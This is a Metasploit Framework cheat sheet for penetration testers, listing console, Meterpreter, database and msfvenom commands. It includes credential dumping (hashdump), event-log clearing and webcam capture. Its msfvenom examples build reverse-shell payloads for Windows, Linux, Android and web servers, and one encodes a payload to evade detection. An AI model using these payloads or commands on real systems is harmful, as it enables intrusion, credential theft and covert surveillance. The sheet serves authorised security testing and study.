Metasploit Framework

Command reference for MSFconsole, Meterpreter and msfvenom. Commands in English, descriptions follow your language.

Use only against systems you are explicitly authorized to test.

Core Commands

? — Help menu.

banner — Display a Metasploit banner.

cd — Change working directory.

color — Toggle color.

connect — Communicate with a host.

debug — Show debugging info.

exit — Exit the console.

features — List opt-in features.

get — Get a context-specific variable.

getg — Get a global variable.

grep — Grep another command's output.

help — Help menu.

history — Show command history.

load — Load a framework plugin.

quit — Exit the console.

repeat — Repeat a list of commands.

route — Route traffic through a session.

save — Save the active datastore.

sessions — List session information.

set — Set a context-specific variable.

setg — Set a global variable.

sleep — Do nothing for N seconds.

spool — Write output to a file & screen.

threads — View/manipulate background threads.

tips — Show productivity tips.

unload — Unload a framework plugin.

unset — Unset context-specific variables.

unsetg — Unset global variables.

version — Show framework / library versions.

Module & Basic Commands

advanced — Show advanced module options.

back — Move back from current context.

clearm — Clear the module stack.

favorite — Add modules to favorites.

info — Show info about a module.

listm — List the module stack.

loadpath — Search & load modules from a path.

options — Show module / global options.

popm — Pop the latest module off the stack.

previous — Set the previously loaded module.

pushm — Push module(s) onto the stack.

reload_all — Reload all modules.

search — Search module names & descriptions.

show — Show modules of a type.

use — Select a module by name / index.

Meterpreter Commands

help — Show Meterpreter help.

background — Background the current session.

cat — Show a file's content.

cd / pwd — Change & show working directory.

clearev — Clear Windows event logs.

download — Download a file from the target.

edit — Edit a file on the target (vim).

execute — Run a command on the target.

getuid — Show the server's running user.

hashdump — Dump the SAM database.

idletime — Show user idle seconds.

ipconfig — Show network interfaces.

lpwd / lcd — Show & change local directory.

ls — List files in current directory.

migrate — Migrate to another process.

ps — List running processes.

resource — Run Meterpreter script from file.

search — Locate files on the target.

shell — Drop to a target shell.

upload — Upload a file to the target.

webcam_list — List available webcams.

webcam_snap — Snap a picture from a webcam.

Database Commands

db_connect — Connect to a database.

db_disconnect — Disconnect from the database.

db_export — Export the database contents.

db_import — Import a scan result file.

db_nmap — Run nmap & record output.

db_rebuild_cache — Rebuild the module cache.

db_status — Show database status.

db_remove — Remove a saved data service.

db_save — Save the data service as default.

analyze — Analyze hosts / address ranges.

hosts — List all hosts.

loot — List all loot.

notes — List all notes.

services — List all services.

vulns — List all vulnerabilities.

creds — List all credentials.

workspace — Switch between workspaces.

Jobs, Resource & Developer

handler — Start a payload handler as job.

jobs — Display & manage jobs.

kill — Kill a job.

rename_job — Rename a job.

makerc — Save commands to a resource file.

resource — Run commands from a file.

edit — Edit current module / file.

irb — Open an interactive Ruby shell.

log — Display framework.log.

pry — Open the Pry debugger.

reload_lib — Reload Ruby library files.

time — Time a command's execution.

Payload Types

Inline (Non Staged) — Self-contained, more stable.

Stager — Sets up a connection for a stage payload.

Meterpreter — Advanced multi-feature payload.

PassiveX — Bypass outbound firewalls via ActiveX.

NoNX — Avoids No-eXecute (NX / DEP).

Ord — Ordinal payloads (small, Windows).

IPv6 — Built to work over IPv6 networks.

Reflective DLL injection — Inject a stage into memory, no disk.

Module Types

Active exploits run to completion; passive exploits wait for incoming hosts.

Auxiliary — Scanning, fuzzing, sniffing modules.

Encoders — Encode payloads to evade detection.

Exploits — Code that targets a vulnerability.

Nops — No-op generators for sleds.

Payloads — Code run after exploitation.

msfvenom Options

-p, --payload — Payload to use.

--payload-options — List the payload's options.

-l, --list [type] — List a module type.

-n, --nopsled — Prepend a NOP sled.

-f, --format — Output format.

--help-formats — List available formats.

-e, --encoder — Encoder to use.

-a, --arch — Target architecture.

--platform — Payload platform.

--help-platforms — List available platforms.

-s, --space — Max size of the payload.

--encoder-space — Max size of the encoded payload.

-b, --bad-chars — Characters to avoid.

-i, --iterations — Number of encoding passes.

-c, --add-code — Add a win32 shellcode file.

-x, --template — Use a custom executable template.

-k, --keep — Keep template; run payload as new thread.

-o, --out — Save the payload.

-v, --var-name — Custom variable name.

--smallest — Generate the smallest payload.

-h, --help — Show help.

msfvenom Examples

Replace (IP) and (PORT) with your listener values.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f exe > example.exemsfvenom -p windows/meterpreter/reverse_http LHOST=(IP) LPORT=(PORT) -f exe > example.exemsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f elf > example.elfmsfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP) LPORT=(PORT) -f macho > example.machomsfvenom -p android/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) R > example.apkmsfvenom -p php/meterpreter_reverse_tcp LHOST=(IP) LPORT=(PORT) -f raw > example.phpmsfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f asp > example.aspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP) LPORT=(PORT) -f raw > example.jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP) LPORT=(PORT) -f war > example.war

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -e x86/shikata_ga_nai -b "\x00" -i 3 -f exe > example.exe

Building Ranges & Lists

Commands that take ID or IP lists accept ranges (-) and comma lists.

jobs -k 2-6,7,8,11,15check 127.168.0.16,15check 127.0.0-2.1-4

Encoder Architectures

use encoder/<arch>/<name>

cmdgenericmipsbemipslephpppcrubysparcx64x86

Exploit Platforms

aixandroidapple_iosbsddialupfirefoxfreebsdhpuxirixlinuxmainframemultinetwareosxsolarisunixwindows

Auxiliary Categories

adminanalyzebnatcrawlerdocxdosfuzzersgatherparserpdfscannerserversnifferspoofsqlivsploitvoip

Nop Architectures

mipsbephpppcsparcttyx64x86

Plugins (load)

load <plugin>

aggregatoraliasauto_add_routebeholderbeSECUREcapturedb_credcollectdb_trackerevent_testerflautoregenips_filterlablibnotifymsfdmsgrpcnessusopenvaspcap_logrequestrssfeedsamplesession_notifiersession_taggersocket_loggersoundssqlmapthreadtoken_addusertoken_hunterwikiwmap

Compiled from the “Metasploit Framework” chart by Hacking Articles (Ignite Technologies); descriptions condensed.